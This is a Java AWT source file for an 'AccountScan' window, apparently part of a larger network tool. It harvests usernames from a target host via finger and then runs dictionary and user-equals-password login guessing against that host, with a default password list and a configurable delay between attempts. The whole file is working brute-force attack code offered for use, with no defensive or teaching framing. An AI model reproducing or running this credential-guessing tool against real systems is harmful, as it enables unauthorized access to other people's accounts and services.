import java.awt.*;
import java.io.*;
import java.lang.reflect.*;
import java.awt.event.*;

public class AccountExecutor extends Frame implements Runnable, ActionListener, WindowListener
{
 private Thread runner;
 private String host;
 private int length;
 private String[] names;
 private Button ok = new Button("Ok");
 private TextField pass = new TextField("start",16);
 private CheckboxGroup grp = new CheckboxGroup(); 
 private Checkbox useUser = new Checkbox("PASS = USER",false,grp);
 private Checkbox useCustomPass = new Checkbox("Use PASS:",false,grp);
 private Checkbox usePasslist = new Checkbox("Use PASSlist",true,grp);
 private Panel p = new Panel();
 private Panel p2 = new Panel();
 private Panel p_up = new Panel();
 private Panel p_down = new Panel();
 private TextArea namesField = new TextArea();
 private TextArea passField = new TextArea();
 private Label userL = new Label("Userlist");
 private Label passL = new Label("Passwords:");
 private Button loadUser = new Button("Load");
 private Button loadPass = new Button("Load");
 private Button saveUser = new Button("Save");
 private Button savePass = new Button("Save");
 private Button finger = new Button("Finger @"+JCon.host.getText()+" and put names in userlist");
 private String userFile;
 private String passFile;
 private String userFileOld;
 private String passFileOld;
 private boolean listed = false;
 private boolean passed = false;
 private boolean mayDispose = true;
 private int delay = 3000;
 private DelayChooser dlc;

public AccountExecutor(String host) {this(host, new String[1]);} 

public AccountExecutor(String host, String[] names)
{
  this.host = host;
  this.names = names;
  length = FingerSorter.getLength(names);
  
  setSize(600,380);
  setTitle("AccountScan: " + host);
  setBackground(Color.lightGray); 
  setLocation(50,100); 
  addWindowListener(this);

  p_up.setLayout(new FlowLayout());
  p_up.add(usePasslist);
  p_up.add(useUser);
  p_up.add(useCustomPass);
  p_up.add(pass);
  p_up.add(ok);
  ok.addActionListener(this);
  grp.setSelectedCheckbox(usePasslist);
 
 p_down.setLayout(new GridLayout(1,6,30,0));
 p_down.add(userL);
 p_down.add(saveUser);
 p_down.add(loadUser);
 p_down.add(passL);
 p_down.add(savePass);
 p_down.add(loadPass);

loadUser.addActionListener(this);
loadPass.addActionListener(this);
saveUser.addActionListener(this);
savePass.addActionListener(this);

 p.setLayout(new GridLayout(2,1,0,0));
 p.add(p_up);
 p.add(p_down);

 p2.setLayout(new GridLayout(1,2,5,5));
 p2.add(namesField);
 p2.add(passField);

 Panel opt = new Panel();
 opt.setLayout(new FlowLayout(FlowLayout.LEFT));
 opt.add(finger);
 finger.addActionListener(this);

 setLayout(new BorderLayout(5,5));
 add("North",p);
 add("Center",p2);
 add("South", opt);

 for(int i = 0; i < FingerSorter.getLength(names); i++)
 {
  namesField.append(names[i]+"\n");
 }

 passFile = "templates/_stdpass";
 silentLoadPass();

 dlc = new DelayChooser(this);
}

public void actionPerformed(ActionEvent e)
{
 if(e.getSource() == dlc.okDelay)
 {
  dlc.okDelay.removeActionListener(this);
  try
  {
   delay = Integer.parseInt(dlc.getDelay());
   dlc.dispose();
   setVisible(true);
  }
  catch(Exception ex)
  {
   delay = 500;
   dlc.delay.setText("500");
   pause(1000);
   dlc.dispose();
   setVisible(true);
  }
 }

 if(e.getSource() == ok)
  {
   userFileOld = userFile;
   passFileOld = passFile;
   userFile = ".names~";
   passFile = ".pass~";
 
   saveFile("USER");
   saveFile("PASS");
   runList();
  }
 if(e.getSource() == loadUser) {loadFile("USER");}
 if(e.getSource() == loadPass) {loadFile("PASS");}
 if(e.getSource() == saveUser) {nameFile("USER"); saveFile("USER");}
 if(e.getSource() == savePass) {nameFile("PASS"); saveFile("PASS");}

if(e.getSource() == finger)
{
  JCon.status("Starting finger...");
  Finger finger = new Finger(host, false, true);
  String[] tmp = finger.getBuffer();
  FingerSorter sorter = new FingerSorter();
  String nms[] = sorter.sort(tmp);

 for(int i=0; i<Resource.getLength(nms); i++)
 {
  namesField.append("\n"+nms[i]);
 }
}

}

public void nameFile(String which)  
{ 
String file; 
 
FileDialog fd = new FileDialog(new Frame(), "Save As...", FileDialog.SAVE); 
fd.setVisible(true); 
if(fd.getFile() != null)  
{ 
 file = fd.getDirectory() + fd.getFile(); 
 if(which.equals("USER")) { userFile = file; }
 if(which.equals("PASS")) { passFile = file; }
} 
} 

private void saveFile(String which) 
{ 
 String data = "";
 String file = "";

 if(which.equals("USER")) { data = namesField.getText(); file = userFile; }
 if(which.equals("PASS")) { data = passField.getText(); file = passFile; }

 try 
 { 
  PrintStream out = new PrintStream(new FileOutputStream(file)); 
  out.print(data); 
 } 
 catch (IOException e) {JCon.status("Can't save!");} 
} 

public void runIt()
{
 runner = new Thread(this);
 runner.start();
}

private void runList()
{
 boolean again = true;
 int cnt = 0;
 RandomAccessFile rd;

 try  
 { 
  rd = new RandomAccessFile(userFile,"r");  

 while(again) 
 { 
   String str = rd.readLine(); 
   if(str == null) {again=false; break;}
   cnt++;
 }
 names = new String[cnt];
 length = cnt-1;
 rd = new RandomAccessFile(userFile,"r");  
  
 for(int i = 0; i < cnt; i++)
 { 
  String str = rd.readLine();
  if(Resource.removeSpaces) {str = Resource.cut(str, " ");}
  names[i] = str;
 }
  } 
  catch(Exception ex) {System.out.println(ex+"@AccountExecutor.runList()");}

 runIt();
}

public void run()
{
 setVisible(false);

if(useUser.getState())
{
 for(int i=0; i<length; i++)
 {
  JCon.status("#"+i+"/"+(length-1)+" ("+names[i]+"/"+names[i]+")");
  AccountScanner acs = new AccountScanner(host, false, names[i], names[i]);
  pause(delay);
 }
}

if(useCustomPass.getState())
{
 for(int i=0; i<length; i++)
 {
  JCon.status("#"+i+"/"+(length-1)+" ("+names[i]+"/"+pass.getText()+")");
  AccountScanner acs = new AccountScanner(host, false, names[i],pass.getText());
  pause(delay);
 }
}

if(usePasslist.getState()) {useList();}

passFile = passFileOld;
userFile = userFileOld;

JCon.status("Finished...");
}


private void useList()
{
 RandomAccessFile rd; 
 boolean again = true;
 
 try  
 {  
 rd = new RandomAccessFile(passFile,"r");  

 while(again) 
 { 
   String str = rd.readLine();
   if(Resource.removeSpaces) {str = Resource.cut(str, " ");}
   if(str == null) {again=false;} 

  for(int i=0; i<length; i++)
  {
   JCon.status("#"+i+"/"+(length-1)+" ("+names[i]+"/"+str+")");
   AccountScanner acs = new AccountScanner(host, false, names[i], str);
   pause(delay);
  }
 } 

}
catch(Exception ex) {System.out.println(ex);} 
}

private void pause(int time) 
{ 
try {Thread.sleep(time);} 
catch(Exception ex) {System.out.println(ex);} 
} 

private void loadFile(String which) 
{ 
String file = ""; 
String dir = ""; 
 
FileDialog fd = new FileDialog(new Frame(), "Load...", FileDialog.LOAD); 
fd.setVisible(true); 
if(fd.getFile() != null)  
{ 
 file = fd.getFile(); 
 dir = fd.getDirectory(); 
} 
 
try  
{ 
 String data = ""; 
 String now = ""; 
 DataInput in = new DataInputStream(new FileInputStream(dir + file)); 
 
 try {while( (data = in.readLine()) != null)  
 { 
  now = now + data + "\n";} 
 } 
 catch (IOException e) {JCon.status(e.toString());System.out.println(e+"@AccountExecutor.loadFile()");}

 if(which.equals("USER")) 
 {
  namesField.setText(now);
  userFile = dir+ file;
  listed = true;
 }
 if(which.equals("PASS")) 
 {
  passField.setText(now);
  passFile = dir+ file;
  passed = true;
 }
 } 
catch (FileNotFoundException e) {JCon.status("Error while loading!");} 
} 

private void silentLoadPass() 
{ 
 
try  
{ 
 String data = ""; 
 String now = ""; 
 DataInput in = new DataInputStream(new FileInputStream(passFile)); 
 
 try {while( (data = in.readLine()) != null)  
 { 
  now = now + data + "\n";} 
 } 
 catch (IOException e) {JCon.status(e.toString());} 

  passField.setText(now);
 } 
catch (FileNotFoundException e) {JCon.status("Error while loading!");} 
} 

public void windowClosing(WindowEvent e) {if(mayDispose) {this.dispose();}} 
public void windowIconified(WindowEvent e) {} 
public void windowDeiconified(WindowEvent e) {} 
public void windowClosed(WindowEvent e) {} 
public void windowActivated(WindowEvent e) {} 
public void windowDeactivated(WindowEvent e) {} 
public void windowOpened(WindowEvent e) {} 
}
